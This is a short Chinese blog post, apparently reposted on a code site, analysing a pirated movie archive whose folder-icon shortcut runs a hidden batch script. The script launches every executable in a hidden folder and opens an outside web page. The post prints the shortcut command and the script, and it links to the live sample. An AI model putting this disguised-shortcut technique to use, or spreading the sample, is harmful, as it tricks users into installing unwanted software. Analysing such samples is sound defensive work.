首页 > 代码库 > 一次遇到流氓软件的经历
一次遇到流氓软件的经历
想看一部电影,下载好后,点开然后发现系统被装了一堆流氓软件,于是分析了压缩包的内容,发现些有趣的东西。
首先解压压缩包,进入解压后文件夹,发现都是链接(当时看到文件夹图标就点开了)
看看那个带有文件夹图标的属性
首先这是个快捷方式,然后运行一个命令
%windir%\system32\cmd.exe /c start 20140210\10.bat
cmd运行一个脚本,那个脚本在哪里呢,开启显示隐藏文件的属性后,再看那个解压后的文件夹
多了一个隐藏文件夹,打开一看
10.bat 那个脚本文件找到了,记事本打开看看
@echo off for /f "delims=" %%a in (‘dir 20140210\ /s /b /a-d^|findstr /v /i "10.bat"‘) do (start "" "%%a") start http://t.hao168.pw/akdata/load.html?baidu-20140210-冰雪奇缘迅雷种子_高清完整BD版种子 exit
基本意思就是运行文件夹”冰雪奇缘迅雷种子_高清完整BD版种子”中exe文件
原理很简单,但是很容易中招,如果那个脚本运行的是一些危害计算机的代码,麻烦就大了。
有兴趣研究的可下载看看,不过要小心不要运行那个快捷方式
http://pan.baidu.com/s/1o60RYp8
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。